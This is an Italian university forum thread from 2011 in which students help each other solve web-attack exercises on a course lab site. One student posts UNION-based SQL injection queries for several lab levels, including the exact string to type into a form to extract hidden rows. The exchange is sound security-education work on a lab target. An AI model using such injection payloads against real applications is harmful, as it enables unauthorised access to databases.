|
gennaro |
Esercizi Sicurezza - Attacchi Web II PARTE - Lezione 12/5/2011 |
13-05-2011 14:15 |
|
|
gennaro |
ANZIANOTTO
Registered: Apr 2004
Posts: 65 (0.01 al dì)
Location: milano
Corso: comunicazione digitale
Anno: secondo
Time Online: 1 Day, 16:27:37 [...]
Status: Offline
Edit | Report | IP: Logged |
Esercizi Sicurezza - Attacchi Web II PARTE - Lezione 12/5/2011
Come per la prima parte, apro questo thread per aiutarci a risolvere insieme gli altri esercizi sugli attacchi web
http://gamebox.laser.dico.unimi.it/sec2/web2/index.html
sono riuscito a fare solo XXS1 e SQLI1 (tutte e 3 i punti)
qualcuno è riuscito a fare qualche altro livello?
|
13-05-2011 14:15 |
|
|
| |
|
zack1988 |
Risolti i vari problemi sull'SQL Injection, non so ... |
13-05-2011 16:16 |
|
|
zack1988 |
.primate.
Registered: Oct 2007
Posts: 75 (0.01 al dì)
Location: Milano
Corso: Informatica
Anno: 1
Time Online: 2 Days, 2:43:36 [...]
Status: Offline
Edit | Report | IP: Logged |
Risolti i vari problemi sull'SQL Injection, non sono complicati, cercando un pó in rete ho visto che si puó usare l'istruzione UNION di SQL per bypassare la query:
Es: sqli2
SELECT counter, concorrente FROM sqli2 WHERE concorrente='XXX' UNION SELECT concorrente, squadra FROM sqli2 WHERE classificato=1 and '1' = '1';
Es: sqli3
SELECT counter, concorrente FROM sqli3 WHERE counter=999 UNION SELECT concorrente, squadra FROM sqli3 WHERE classificato=1;
Es: sqli4
SELECT counter, concorrente FROM sqli4 LIMIT 0, 0 UNION SELECT concorrente, squadra FROM sqli4 WHERE classificato=1
|
13-05-2011 16:16 |
|
|
| |
|
zack1988 |
Si poteva risolvere in un'altro modo findendo la q ... |
13-05-2011 16:20 |
|
|
zack1988 |
.primate.
Registered: Oct 2007
Posts: 75 (0.01 al dì)
Location: Milano
Corso: Informatica
Anno: 1
Time Online: 2 Days, 2:43:36 [...]
Status: Offline
Edit | Report | IP: Logged |
Si poteva risolvere in un'altro modo findendo la query:
SELECT counter, concorrente FROM sqli2 WHERE concorrente='XXX';
e di seguito inserire la propria query
SELECT concorrente, squadra FROM sqli2 WHERE classificato=1 and '1' = '1';
Ma non so perché da console sql tutto ok, nella form invece continua a darmi un errore sulla sintassi SQL.
|
13-05-2011 16:20 |
|
|
| |
|
gennaro |
zack quelle query le scrivi nello spazio apposta o ... |
14-05-2011 00:19 |
|
|
gennaro |
ANZIANOTTO
Registered: Apr 2004
Posts: 65 (0.01 al dì)
Location: milano
Corso: comunicazione digitale
Anno: secondo
Time Online: 1 Day, 16:27:37 [...]
Status: Offline
Edit | Report | IP: Logged |
zack quelle query le scrivi nello spazio apposta o nell'url o da qualche altra parte? perchè ho provato ma nn me ne funziona neanche uno di quelli che hai scritto O_o
p.s. a meno che debba usare burp, cosa ke odio e che quindi non uso mai
|
14-05-2011 00:19 |
|
|
| |
|
zack1988 |
No devi scrivere solo una parte :
... |
14-05-2011 12:46 |
|
|
zack1988 |
.primate.
Registered: Oct 2007
Posts: 75 (0.01 al dì)
Location: Milano
Corso: Informatica
Anno: 1
Time Online: 2 Days, 2:43:36 [...]
Status: Offline
Edit | Report | IP: Logged |
No devi scrivere solo una parte :
Es SQLI2
Nella pagina c'è scritto SQL query: SELECT counter, concorrente FROM sqli2 WHERE concorrente=''
e bisogna completarlo inserendo nella form:
XXXXXXX' UNION SELECT concorrente, squadra FROM sqli2 WHERE classificato=1 and '1' = '1
e quando premi invio si nota vedi la query che ho scritto nel post precedente.
Gli altri es sono uguali tranne che non hai una form ma devi inviare una POST.
Spero di essere stato chiaro
|
14-05-2011 12:46 |
|
|
| |
|
gennaro |
spiegazione impeccabile! grazie mille! ... |
14-05-2011 14:39 |
|
|
gennaro |
ANZIANOTTO
Registered: Apr 2004
Posts: 65 (0.01 al dì)
Location: milano
Corso: comunicazione digitale
Anno: secondo
Time Online: 1 Day, 16:27:37 [...]
Status: Offline
Edit | Report | IP: Logged |
spiegazione impeccabile! grazie mille!
|
14-05-2011 14:39 |
|
|
| |
|
simoki |
Re: Esercizi Sicurezza - Attacchi Web II PARTE - Lezione 12/5/2011 |
14-05-2011 18:10 |
|
|
simoki |
antani
Registered: Apr 2007
Posts: 23 (0.00 al dì)
Location: milano
Corso: Informatica
Anno: 3
Time Online: 15:43:51 [...]
Status: Offline
Edit | Report | IP: Logged |
Re: Esercizi Sicurezza - Attacchi Web II PARTE - Lezione 12/5/2011
Originally posted by gennaro
Come per la prima parte, apro questo thread per aiutarci a risolvere insieme gli altri esercizi sugli attacchi web
http://gamebox.laser.dico.unimi.it/sec2/web2/index.html
sono riuscito a fare solo XXS1 e SQLI1 (tutte e 3 i punti)
qualcuno è riuscito a fare qualche altro livello?
Recipes e Marmot Memo (con una delle due varianti) superati.
per gli altri ancora niente..
|
14-05-2011 18:10 |
|
|
| |
|
gennaro |
non ho ancora dato un'occhiata a tutti questi live ... |
16-05-2011 00:20 |
|
|
gennaro |
ANZIANOTTO
Registered: Apr 2004
Posts: 65 (0.01 al dì)
Location: milano
Corso: comunicazione digitale
Anno: secondo
Time Online: 1 Day, 16:27:37 [...]
Status: Offline
Edit | Report | IP: Logged |
non ho ancora dato un'occhiata a tutti questi livelli
si tratta sempre di SQL injection e XXS o come negli altri bisogna guardare codice sorgente, script cookie, etc?
|
16-05-2011 00:20 |
|
|
| |
|
gennaro |
come hai fatto a fare quei due livelli?? non riesc ... |
18-05-2011 16:42 |
|
|
gennaro |
ANZIANOTTO
Registered: Apr 2004
Posts: 65 (0.01 al dì)
Location: milano
Corso: comunicazione digitale
Anno: secondo
Time Online: 1 Day, 16:27:37 [...]
Status: Offline
Edit | Report | IP: Logged |
come hai fatto a fare quei due livelli?? non riesco proprio a riuscirci (in particolare Marmot Memo, sto impazzendo!!! XD)
|
18-05-2011 16:42 |
|
|
| |
|
MarcoVigna17 |
ma gli ultimi esercizi, con che modalità si risol ... |
27-06-2011 12:51 |
|
|
MarcoVigna17 |
.precettore.
Registered: Dec 2007
Posts: 92 (0.01 al dì)
Location: Robecco sul Naviglio
Corso: Informatica
Anno: 1
Time Online: 20:21:26 [...]
Status: Offline
Edit | Report | IP: Logged |
ma gli ultimi esercizi, con che modalità si risolvono???
|
27-06-2011 12:51 |
|
|
| |
|
All times are GMT. The time now is 10:31. |
|
|
|
|
|
|
|
| |
Forum Rules:
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
|
HTML code is OFF
vB code is ON
Smilies are ON
[IMG] code is ON
|
|
|
|
|
|